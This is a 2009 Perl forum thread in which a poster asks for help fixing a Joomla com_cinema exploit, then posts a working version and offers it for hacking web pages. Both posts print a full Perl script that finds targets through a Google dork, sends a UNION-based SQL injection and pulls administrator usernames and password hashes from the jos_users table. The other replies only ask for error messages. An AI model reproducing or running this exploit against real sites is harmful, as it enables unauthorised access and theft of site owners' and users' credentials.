Perl Exploit Need Help

Please support our Perl advertiser: Programming Forums - DaniWeb Sister Site
Reply

Join Date: Jul 2008
Posts: 9
Reputation: suki_boy is an unknown quantity at this point 
Solved Threads: 0
suki_boy suki_boy is offline Offline
Newbie Poster

Perl Exploit Need Help

 
0
  #1
Oct 24th, 2009
Perl Syntax (Toggle Plain Text) 
  1. Hi All,Im a newbie in Perl Coding,and i just cant get this to work it says error compiling
This is an Exploit for Hacking Joomla com_cinema
Heres the Code
Perl Syntax (Toggle Plain Text) 
  1. #!/usr/bin/perl -w
  2.  
  3.  
  4. #Joomla Component Cinema 1.0 Remote SQL Injection #
  5. ########################################
  6. #[~] Author : **RoAd_KiLlEr**
  7. #[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
  8. #[~] Google_Dork: allinurl: "com_cinema"
  9. ########################################
  10.  
  11. system("color FF0000");
  12. print "\t ###############################################################\n\n";
  13. print "\t #       C0ded By: **RoAd_KiLlEr** From Alboz-Crew             #\n\n";
  14. print "\t ###############################################################\n\n";
  15. print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln   #\n\n";
  16. print "\t # - Google-Dork: allinurl: "com_cinema"                      #\n\n";
  17. print "\t # - Alboz-Crew.Net                                                     #\n\n";
  18. print "\t # - Cod3d by : **RoAd_KiLlEr*                                  #\n\n";
  19. print "\t ###############################################################\n\n";
  20. use LWP::UserAgent;
  21. print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
  22. chomp(my $target=<STDIN>);
  23. #Column Name
  24. $c_n="concat(username,0x3a,password)";
  25. #Table_name
  26. $t_n="jos_users";
  27. $U="-9999+UNION+SELECT+";
  28. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  29. $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
  30. $host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
  31. $res = $b->request(HTTP::Request->new(GET=>$host));
  32. $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
  33. print "\n[+] Admin Hash : $1\n\n";
  34. print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
  35. }
  36.  
  37. else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
  38.  }

Thank You
Last edited by suki_boy; Oct 24th, 2009 at 4:29 pm.
Reply With Quote Quick reply to this message  
Join Date: May 2006
Posts: 1,868
Reputation: ithelp is a name known to all ithelp is a name known to all ithelp is a name known to all ithelp is a name known to all ithelp is a name known to all ithelp is a name known to all 
Solved Threads: 120
ithelp's Avatar
ithelp ithelp is offline Offline
Posting Virtuoso
 
0
  #2
Oct 25th, 2009
Post the compilation errors.
Assignment Help | Web Design Service | Homework Help | 498a
Programming Help | Need Help ? | Job Interview | Top 10 Hosts
Reply With Quote Quick reply to this message  
Join Date: Jul 2008
Posts: 9
Reputation: suki_boy is an unknown quantity at this point 
Solved Threads: 0
suki_boy suki_boy is offline Offline
Newbie Poster

Hey

 
0
  #3
Oct 25th, 2009
Originally Posted by ithelp View Post
Post the compilation errors.
Thanks but i got it to Work.
Who knows a thing or 2 bout hacking will find this quite useful For Joomla's com_cinema Vulneraiblity and can Hack Some WebPages

Ill Post the Exploit Down
Perl Syntax (Toggle Plain Text) 
  1. #!/usr/bin/perl -w
  2.  
  3. #Joomla Component Cinema 1.0 Remote SQL Injection#
  4. ########################################
  5. #[~] Author : **RoAd_KiLlEr**
  6. #[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
  7. #---------------------------------------
  8. #---------------------------------------
  9. #[!] Google-Dork: allinurl: "com_cinema"
  10. ########################################
  11.  
  12. system("color FF0000");
  13. print "\t ###############################################################\n\n";
  14. print "\t #        C0ded By: **RoAd_KiLlEr**   From Alboz-Crew          #\n\n";
  15. print "\t ###############################################################\n\n";
  16. print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln     #\n\n";
  17. print "\t # - Alboz-Crew.Net                                            #\n\n";
  18. print "\t # - Greetz:Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims  #\n\n";
  19. print "\t ###############################################################\n\n";
  20. use LWP::UserAgent;
  21. print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
  22. chomp(my $target=<STDIN>);
  23. #Column Name
  24. $c_n="concat(username,0x3a,password)";
  25. #Table_name
  26. $t_n="jos_users";
  27. $U="-99999/**/union/**/select/**/";
  28. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  29. $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
  30. $host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."0,1,0x3a,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
  31. $res = $b->request(HTTP::Request->new(GET=>$host));
  32. $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
  33. print "\n[+] Admin Hash : $1\n\n";
  34. print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
  35. }
  36. else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
  37. }
Reply With Quote Quick reply to this message  
Join Date: Sep 2009
Posts: 113
Reputation: ov3rcl0ck is an unknown quantity at this point 
Solved Threads: 16
ov3rcl0ck ov3rcl0ck is offline Offline
Junior Poster
 
0
  #4
31 Days Ago
still need errors..
Last edited by ov3rcl0ck; 31 Days Ago at 11:30 am.
NOTE: sudo doesn't apply to real life situations.
Reply With Quote Quick reply to this message  
Reply

Quick Reply to Thread
Message:



Similar Threads
Other Threads in the Perl Forum


Views: 907 | Replies: 3
Thread Tools Search this Thread



Tag cloud for Perl
access array asp cgi checkbox compare hash html http multiplewindows parse parsing perl perlsystemwindows perltk post problem script search split string table text text-file
About Us | Contact Us | Advertise | DaniWeb | Acceptable Use Policy | RSS Feed

©2003 - 2009 DaniWeb® LLC